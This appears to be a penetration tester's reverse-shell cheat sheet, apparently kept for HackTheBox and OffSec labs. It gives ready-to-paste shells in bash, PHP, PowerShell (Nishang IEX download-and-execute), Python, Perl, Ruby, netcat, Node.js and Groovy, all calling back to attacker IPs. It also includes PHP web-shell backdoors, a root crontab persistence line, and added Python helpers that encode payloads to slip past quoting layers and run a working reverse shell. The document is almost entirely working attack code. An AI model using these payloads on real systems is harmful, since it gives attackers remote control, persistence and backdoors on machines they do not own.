Backlink: reference-notes-readme


Bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1

If we are running this from a plain sh (e.g. dash) rather than bash, the `>&` redirection and the /dev/tcp pseudo-device are bash features and sh will reject the line, so wrap it so that bash itself performs the redirection (append `&` if the calling context must not block):

bash -c 'bash -i >& /dev/tcp/10.10.14.18/443 0>&1'

PHP

Standard PHP Reverse Shell

$sock=fsockopen("10.10.14.18",443);exec("/bin/bash -i <&3 >&3 2>&3");

CLI One-Liner

This php shell opens a reverse connection back to our host, then executes '/bin/bash -i' with stdin, stdout and stderr all redirected to file descriptor 3 (fd3), which is where the socket lands when php runs from the CLI with only fds 0, 1 and 2 already open.

php -r '$sock=fsockopen("10.10.14.18",443);exec("/bin/bash -i <&3 >&3 2>&3");'

Module One-Liner

The issue with the above php one-liner is that when the command is executed, fd3 may be the next available file descriptor, but it very well may not. The above command may work when php is run from the CLI, but it doesn't when php runs as an Apache module or under another SAPI where the process already has other descriptors open. Instead of attaching to a guessed file descriptor in the shell command, the solution is to hand the socket over from the php side, using proc_open() to pass it to the child as fds 0, 1 and 2 explicitly.

Standard PHP

$sock = fsockopen("10.10.14.15",443);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);

CLI One-Liner

php -r '$sock = fsockopen("10.10.14.15",443);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);'

With the above command the shell stays open even after the enclosing script finishes, so php's max_execution_time isn't an issue at all. For more details, see the Information Security Stack Exchange question "Reverse PHP shell disconnecting when netcat listener".

PHP Backdoor One-Liner

<?php echo system($_REQUEST['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

PowerShell

Source Remote Script (Nishang)

Copy Nishang .ps1 script to working directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .

Add the Invoke line to the end of the script file.

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 443' >> Invoke-PowerShellTcp.ps1

Start Python http server to host file.

python3 -m http.server 80
# or pytp alias

Use the following command on the target from a cmd.exe prompt to spawn PowerShell and download/execute the reverse shell script.

powershell -c "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/Invoke-PowerShellTcp.ps1')"

This form also gets around the nested quoting problem, because the IEX string arrives on PowerShell's stdin instead of inside a quoted -c argument. I had to use it to source the script through xp_cmdshell on MSSQL.

echo IEX(New-Object Net.webClient).DownloadString("http://10.1.1.246:8888/rev.ps1") | powershell -noprofile

Raw PowerShell Reverse Shell

From PowerShell Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

From CMD Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Escaped Version For Use in Commands Sent From Host Shell

\"\$client = New-Object System.Net.Sockets.TCPClient('10.10.14.16',4747);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"
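The escaped version above is the result of one rule: inside a bash "..." string only `$`, `"`, backtick and backslash keep their meaning, so those are the characters that need a backslash, while the single quotes the PowerShell body uses for its own strings can stay as they are. The helper below, which is an added example and not part of the page, does that escaping mechanically and also shows the alternative that sidesteps the "multiple quote issue" mentioned under the Nishang notes entirely: PowerShell's -EncodedCommand, which takes the script as base64 of its UTF-16LE bytes, so nothing in the payload is special to bash, cmd.exe, SQL or PowerShell. SAMPLE_PS is a constructed, shortened excerpt of the page's one-liner.

```python
import base64

# Inside a bash "..." string only these keep their meaning; everything else, including ', is literal.
_BASH_DQ_SPECIAL = '\\"$`'

# Constructed excerpt of the page's one-liner; the real body is longer but escapes the same way.
SAMPLE_PS = "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.16',4747);$stream = $client.GetStream()"


def escape_for_bash_double_quotes(script):
    """Backslash each $ " ` \\ so the one-liner survives a bash "..." string on the attacker host."""
    return "".join("\\" + ch if ch in _BASH_DQ_SPECIAL else ch for ch in script)


def wrap_for_remote_cmd(script):
    """The powershell -nop -c \\"...\\" form the page uses, ready to paste inside a host-side "..." string.
    The PowerShell body must use single quotes for its own strings: a literal " would terminate
    the -c argument on the Windows side, which no amount of bash escaping can fix."""
    if '"' in script:
        raise ValueError("use single-quoted strings inside the PowerShell body")
    return 'powershell -nop -c \\"' + escape_for_bash_double_quotes(script) + '\\"'


def powershell_encoded_command(script):
    """-EncodedCommand form: base64 of the UTF-16LE script (that encoding is what powershell.exe expects).
    The result contains only [A-Za-z0-9+/=], so it passes through xp_cmdshell and nested shells untouched."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse of the above; also handy for reading what an -EncodedCommand seen in logs actually runs."""
    return base64.b64decode(b64).decode("utf-16le")


def build_delivery(script):
    """Both delivery forms for the same script."""
    return {
        "escaped": wrap_for_remote_cmd(script),
        "encoded": "powershell -nop -EncodedCommand " + powershell_encoded_command(script),
    }


if __name__ == "__main__":
    for form, cmd in build_delivery(SAMPLE_PS).items():
        print(form + ": " + cmd)
```

The encoded form is longer but is the one to reach for when the command passes through more than one quoting layer (bash to a SQL string to cmd.exe to PowerShell); the escaped form is fine for a single host-side "..." wrapper.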

Python

Raw Python

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

One-Liner

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
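The Python one-liner above and the PHP proc_open() variant solve the same problem the php module note describes: rather than guessing that the socket landed on fd 3, the socket's own descriptor is handed to the shell as fds 0, 1 and 2, whatever number it actually got. The following is an added example, not code from the page: it runs both ends on 127.0.0.1 in one process (the listener thread plays the role of `nc -lvnp 443`), opens a spare pipe first so that, as in a php module, fd 3 is already taken, and then reports which fd the socket really received alongside the output the shell sent back. The port is chosen by the OS and the commands sent ("echo reverse-ok", "pwd") are constructed for the demo.

```python
import os
import socket
import subprocess
import threading


def start_listener(host="127.0.0.1", port=0, timeout=15.0):
    """Attacker side: what `nc -lvnp 443` does. port=0 asks the OS for a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(timeout)
    return srv


def drive_shell(srv, commands, timeout=15.0):
    """Accept one callback, feed it commands, return everything the shell sent until it hung up."""
    conn, _peer = srv.accept()
    conn.settimeout(timeout)
    conn.sendall(("".join(c + "\n" for c in commands) + "exit\n").encode())
    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:  # the shell exited and its copies of the socket were closed
                break
            chunks.append(data)
    finally:
        conn.close()
    return b"".join(chunks).decode(errors="replace")


def reverse_shell(host, port, shell=("/bin/sh", "-i")):
    """Victim side. Connect back and hand the socket to the shell as fds 0, 1 and 2 explicitly
    (the proc_open() / os.dup2() approach) instead of assuming it landed on fd 3
    (the `<&3 >&3 2>&3` approach). Returns the fd number the socket actually got."""
    s = socket.create_connection((host, port))
    sock_fd = s.fileno()
    proc = subprocess.Popen(list(shell), stdin=s, stdout=s, stderr=s)
    s.close()  # the child owns its own copies; dropping ours lets the listener see EOF on exit
    proc.wait()
    return sock_fd


def demo(commands=("echo reverse-ok", "pwd")):
    """Run listener and callback in one process. The spare pipe opened first reproduces the
    'fd 3 is already in use' situation of a php module, so the socket can never be fd 3 here."""
    spare = os.pipe()
    srv = start_listener()
    port = srv.getsockname()[1]
    result = {}
    t = threading.Thread(
        target=lambda: result.update(output=drive_shell(srv, list(commands))), daemon=True
    )
    t.start()
    sock_fd = reverse_shell("127.0.0.1", port)
    t.join(timeout=20)
    srv.close()
    for fd in spare:
        os.close(fd)
    return {
        "socket_fd": sock_fd,
        "hardcoded_fd3_would_work": sock_fd == 3,
        "output": result.get("output", ""),
    }


if __name__ == "__main__":
    r = demo()
    print("socket was fd", r["socket_fd"], "; '<&3' would have worked:", r["hardcoded_fd3_would_work"])
    print(r["output"])
```

The interesting line is the Popen call: subprocess does the dup2() of the socket onto 0, 1 and 2 inside the child, exactly what the one-liner's os.dup2() calls and PHP's `array(0=>$sock, 1=>$sock, 2=>$sock)` do, and it works no matter how many descriptors the calling process already had open.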

Perl

Raw Perl

use Socket;$i="10.10.14.36";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

One-Liner

perl -e 'use Socket;$i="10.10.14.36";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

Raw Ruby

f=TCPSocket.open("10.10.14.36",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

One-Liner

ruby -rsocket -e'f=TCPSocket.open("10.10.14.36",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Standard

nc -e /bin/sh 10.10.14.31 443

Non-Execute Versions

If the installed nc lacks -e (the option that runs a command with its stdin/stdout attached to the connection), you may still be able to get a shell back by going through a named pipe: nc writes what the listener sends into the pipe, cat feeds the pipe to the shell, and the shell's output is piped back into nc.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 443 >/tmp/f

Scheduled Callback

We can schedule a reverse nc shell to spawn every minute by appending a line to /etc/crontab, provided we have some way of writing to it as root (for instance a script that root already executes). Because /etc/crontab is the system crontab, the line needs the user column (root) before the command. For an example, see the box Fail in the OffSec Proving Grounds Practice section.

echo "*  *  *  *  * root nc 192.168.118.5 4444 -e /usr/bin/bash" >> /etc/crontab

JavaScript

Node.js, using the net and child_process modules; the shell's stdin/stdout/stderr are piped to and from the socket. The trailing return /a/ only stops the result of the expression being printed.

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4443, "192.168.49.205", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Groovy

String host = "192.168.45.5";
int port = 443;
String cmd = "/bin/sh";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {}
};
p.destroy();
s.close();